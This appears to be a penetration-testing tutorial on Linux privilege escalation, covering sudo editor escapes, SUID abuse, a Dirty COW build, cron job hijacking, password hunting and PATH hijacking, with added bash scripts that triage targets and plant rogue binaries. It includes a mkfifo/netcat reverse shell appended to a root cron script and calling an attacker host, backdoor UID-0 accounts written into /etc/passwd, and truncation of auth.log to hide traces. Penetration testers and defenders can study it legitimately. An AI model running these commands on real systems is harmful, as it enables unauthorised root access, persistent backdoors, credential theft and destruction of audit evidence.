Privilege Escalation Techniques in Linux Penetration Testing


You Should Know:

Privilege escalation is a critical phase in penetration testing: the tester moves from an initial foothold, usually an unprivileged user or a web-application account, to higher permissions, usually root. Below are practical commands, techniques, and steps to identify and exploit privilege escalation weaknesses on Linux systems. The order matters: enumerate first, exhaust misconfigurations (sudo, SUID, cron, PATH, leaked credentials) before reaching for kernel exploits, which are the least reliable option.

1. Enumeration Commands

  • Check Current User Privileges:
    id
    whoami
    
  • List Sudo Permissions (look for NOPASSWD entries, and note whether the Defaults line shows env_reset and secure_path, which decide whether environment tricks will work):
    sudo -l
    
  • Check for SUID/SGID Files (restrict to regular files; SGID directories are normal and only add noise):
    find / -type f \( -perm -u=s -o -perm -g=s \) 2>/dev/null
    
  • Kernel Version Check:
    uname -a
    
  • List Running Processes:
    ps aux
    

2. Exploiting Misconfigured Sudo Permissions

  • If a user may run specific commands as root, the command itself is the escalation vector. A text editor is the classic case, because `vi` started under sudo can spawn a shell that keeps root:
    sudo vi /etc/passwd
    :!/bin/bash
    
  • Alternatively, stay in the editor and add a second UID-0 account. Because the editor already runs as root, the line can simply be typed into the buffer and saved; the original trick of `:r!echo '...' >> /etc/passwd` only works because the shell redirect appends to the file behind the editor's back. An empty password field is accepted only where PAM allows null passwords, so generate a hash first:
    openssl passwd -6 'Passw0rd!'
    root2:<hash printed by openssl>:0:0:root:/root:/bin/bash
    

3. Exploiting SUID/SGID Binaries

  • Not every SUID file is exploitable; the useful ones can execute commands or read and write arbitrary files, and GTFOBins lists the known escapes. For example, if `find` has the SUID bit, `-exec` runs commands with the effective UID of the binary. `whoami` confirms it; to get a usable shell, start one with `-p` so the shell does not drop the effective UID back to your own:
    touch test
    find test -exec whoami \;
    find test -exec /bin/sh -p \; -quit
    
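Triaging the SUID list from section 1 and the `sudo -l` output from section 2 by hand gets tedious on a large host. The following bash script, added here as an example rather than taken from the original post, does both against a short illustrative subset of GTFOBins. The shortlist, the function names and the `sudo -l` layout it parses (the standard `(user) NOPASSWD: /path, /path` lines) are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): triage the output of the SUID
# search and of `sudo -l` against a shortlist of binaries with documented
# shell or file-write escapes. The list is an illustrative subset of GTFOBins,
# not a complete one.

GTFO_SHORTLIST="bash sh dash find vim vi nano less more awk python python3 perl env cp mv tee nmap tar zip"

# Print SUID or SGID regular files below $1 (default /), silencing the
# permission-denied noise from directories we cannot enter.
list_suid_sgid() {
    local root="${1:-/}"
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Filter paths on stdin down to those whose basename is on the shortlist.
flag_gtfobins() {
    local path name
    while IFS= read -r path; do
        name="$(basename "$path")"
        case " $GTFO_SHORTLIST " in
            *" $name "*) printf '%s\n' "$path" ;;
        esac
    done
}

# Extract the command paths granted in `sudo -l` output fed on stdin. Lines
# such as "(root) NOPASSWD: /usr/bin/vi, /usr/bin/find" yield one path per
# line; a blanket grant prints as "ALL". Arguments after the path are dropped.
sudo_allowed_commands() {
    grep -E '^[[:space:]]*\(' \
        | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//' \
        | tr ',' '\n' \
        | sed -E 's/^[[:space:]]*((NO)?PASSWD|(NO)?EXEC|(NO)?SETENV):[[:space:]]*//' \
        | awk 'NF { print $1 }'
}

# Combine the two: print each sudo-granted command with a verdict.
triage_sudo() {
    local cmd
    sudo_allowed_commands | while IFS= read -r cmd; do
        if [ "$cmd" = "ALL" ]; then
            printf '%s\tfull root via sudo\n' "$cmd"
        elif printf '%s\n' "$cmd" | flag_gtfobins | grep -q .; then
            printf '%s\tshell escape candidate, check GTFOBins\n' "$cmd"
        else
            printf '%s\tno known escape in shortlist\n' "$cmd"
        fi
    done
}

# Usage on a live host (not executed here):
#   list_suid_sgid / | flag_gtfobins
#   sudo -l 2>/dev/null | triage_sudo
```

A binary not on the shortlist is not necessarily safe; the point of the script is to surface the obvious candidates quickly so that the remaining entries can be looked up one by one.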

4. Kernel Exploits

  • Use tools like `Linux Exploit Suggester` to identify potential kernel vulnerabilities. Treat its output as a list of candidates, not verdicts: distributions backport fixes without bumping the version string, so a kernel that looks vulnerable by `uname -r` may already be patched (compare against the distribution's changelog for that package):
    ./linux-exploit-suggester.sh
    
  • Example: Dirty COW (CVE-2016-5195), a race condition in the kernel's copy-on-write handling that affected kernels released before the October 2016 fixes. The build line below matches the variant that writes a new UID-0 user into `/etc/passwd`, which is why it links against libcrypt. Kernel exploits can hang or crash the host, so back up `/etc/passwd` first and, on a real engagement, get explicit approval before running one:
    gcc -pthread dirty.c -o dirty -lcrypt
    ./dirty
    

5. Exploiting Cron Jobs

  • List the system-wide cron entries and the scripts they run. User crontabs under `/var/spool/cron` are normally readable only by root, so `/etc/crontab` and `/etc/cron.d` are the interesting files, together with the `run-parts` directories (`/etc/cron.hourly` and friends):
    cat /etc/crontab
    ls -la /etc/cron*
    
  • If a script that root's cron runs is writable (or is missing and its directory is writable, so you can create it), append a payload rather than overwriting the file, so the job keeps doing its work and the change is less obvious. The reverse shell below needs `nc` on the target and `<attacker-ip>` replaced; `<writable-script>` is the path taken from the crontab entry:
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f" >> <writable-script>
    
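The manual check above scales poorly once `/etc/cron.d` has a dozen files. The following bash script is an added example, not code from the original post: it parses the crontab formats (system files with a user column, user crontabs without one), pulls out every absolute path in the command part, and reports the ones the current user could tamper with. The file layouts it assumes are the conventional ones; the function names and the sample crontab used to exercise it are constructed for the example.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): enumerate cron jobs and report
# the ones whose script the current user can change. Assumed layouts are the
# standard ones: /etc/crontab and /etc/cron.d/* carry a user column, user
# crontabs under /var/spool/cron do not.

# Print every absolute path appearing in the command part of each job in
# crontab file $1. Pass "system" as $2 for files that have the user column.
# Printing every path (not just the first) catches "/bin/sh /opt/job.sh".
cron_commands() {
    local file="$1" fmt="${2:-user}"
    awk -v fmt="$fmt" '
        /^[ \t]*(#|$)/        { next }   # comment or blank line
        /^[ \t]*[A-Za-z_]+=/   { next }   # SHELL=, PATH=, MAILTO= assignments
        {
            # @reboot/@daily take one field; the classic schedule takes five
            idx = ($1 ~ /^@/) ? 2 : 6
            if (fmt == "system") idx++   # skip the user column
            for (i = idx; i <= NF; i++)
                if ($i ~ /^\//) print $i
        }' "$file"
}

# From the paths found in $1, print those the current user could tamper with:
# writable files, or missing files whose parent directory is writable (you can
# then create the script that root will run).
writable_cron_targets() {
    local file="$1" fmt="${2:-user}" p
    cron_commands "$file" "$fmt" | sort -u | while IFS= read -r p; do
        if [ -w "$p" ]; then
            printf '%s\n' "$p"
        elif [ ! -e "$p" ] && [ -w "$(dirname "$p")" ]; then
            printf '%s (missing, directory writable)\n' "$p"
        fi
    done
}

# Walk the usual locations. Files that are unreadable (user crontabs are
# normally root-only) are skipped silently.
scan_cron() {
    local f
    [ -r /etc/crontab ] && writable_cron_targets /etc/crontab system
    for f in /etc/cron.d/*; do
        [ -f "$f" ] && [ -r "$f" ] && writable_cron_targets "$f" system
    done
    # run-parts directories hold scripts, not crontab lines: test them directly
    for f in /etc/cron.hourly/* /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/*; do
        [ -f "$f" ] && [ -w "$f" ] && printf '%s (run-parts script)\n' "$f"
    done
    for f in /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] && [ -r "$f" ] && writable_cron_targets "$f"
    done
    return 0
}

# Usage on a live host (not executed here):
#   scan_cron
```

The paths printed are the ones to inspect by hand: who the job runs as (the user column, or the owner for user crontabs), how often it fires, and whether the interpreter in front of the script (`/bin/sh /opt/job.sh`) is itself replaceable. A job that runs as an unprivileged service account is still useful for lateral movement but is not a root escalation.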

6. Password Hunting

  • Search for passwords in files. Web roots and home directories are the usual places for configuration files with database credentials; `-n` gives line numbers so hits can be checked quickly:
    grep -rin "password" /home /var/www 2>/dev/null
    
  • Check history files. Passwords typed on the command line (`mysql -p...`, `sshpass`, `curl -u`) end up here, and other users' histories are worth trying too in case their permissions are loose:
    cat ~/.bash_history
    cat /home/*/.bash_history 2>/dev/null
    

7. Exploiting PATH Variable

  • This works only when some privileged process (a SUID binary, a sudo-allowed script, a root cron job) calls a command by bare name and inherits your PATH. sudo normally resets PATH through `secure_path`, so check the Defaults line of `sudo -l` first. If you can write to a directory on that PATH, create a malicious binary there. It needs a shebang, and the shell it spawns needs `-p` so the effective UID is not dropped (a bare `/bin/bash` without `-p`, as in the common one-liner, gives back an unprivileged shell):
    printf '#!/bin/sh\n/bin/sh -p\n' > /tmp/ls
    chmod +x /tmp/ls
    export PATH=/tmp:$PATH
    
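The PATH trick fails silently when its preconditions are not met, so it is worth verifying them before planting anything. The bash script below is an added example, not code from the original post: it lists the writable entries of a PATH string, plants a rogue command, and proves with a stand-in "victim" script that a bare-name invocation resolves to the rogue copy. Nothing in it needs root; the function names and the victim script are constructed for the example, and on a real target the victim is the SUID binary or root-run script that inherits your PATH.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): check the precondition for a
# PATH hijack (a writable PATH entry), plant the rogue command, and show with
# a stand-in victim script that a bare-name call resolves to it.

# Print the entries of PATH-like string $1 that the current user can write to.
# An empty entry (a leading or doubled colon) means the current directory.
writable_path_dirs() {
    local IFS=':' d
    for d in $1; do
        [ -n "$d" ] || d="."
        if [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; fi
    done
}

# Write an executable named $2 into directory $1 whose body is $3.
# Default body: a shell started with -p, so that when the caller runs with a
# root effective UID the shell keeps it (bash and dash both honour -p).
plant_rogue() {
    local dir="$1" name="$2" body="${3:-/bin/sh -p}"
    printf '#!/bin/sh\n%s\n' "$body" > "$dir/$name"
    chmod 755 "$dir/$name"
}

# Run script $2 under PATH=$1 and return its stdout. This stands in for the
# privileged process that calls commands by bare name and inherits PATH.
run_victim_with_path() {
    PATH="$1" /bin/sh "$2"
}

# Usage on a live host (not executed here):
#   writable_path_dirs "$PATH"          # any output means the trick is possible
#   plant_rogue /tmp ls                 # then get the privileged caller to run "ls"
```

The negative case is as informative as the positive one: if `writable_path_dirs "$PATH"` prints nothing and sudo's `secure_path` is in effect, move on to another technique rather than planting files that will never be executed.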

8. Using Metasploit for Privilege Escalation

  • Use Metasploit’s `post/multi/recon/local_exploit_suggester` module to identify potential exploits. It needs an existing session (`set SESSION <id>`) and only reports exploits the framework ships, so it complements the manual checks above rather than replacing them.

9. Post-Exploitation

  • After gaining root, maintain access. The empty password field below means "no password", which only works where PAM permits null passwords; otherwise put a hash from `openssl passwd -6` in that field:
    echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd
    
  • Clear logs. Truncating `auth.log` does nothing about the journald copy or a remote syslog, and a log that suddenly becomes empty is itself an indicator; on an authorised test, check the rules of engagement before touching logs at all:
    echo "" > /var/log/auth.log
    

What Undercode Say:

Privilege escalation is a cornerstone of penetration testing and requires a solid understanding of system configuration and of the vulnerabilities that typically arise from it. Always practice these techniques in a controlled environment. For further reading, check out:
Linux Privilege Escalation Guide
GTFOBins for bypassing restrictions.

Mastering these commands and techniques will significantly improve your ability to identify and exploit privilege escalation weaknesses on Linux systems.

References:

Reported By: 0x Xnum – Hackers Feeds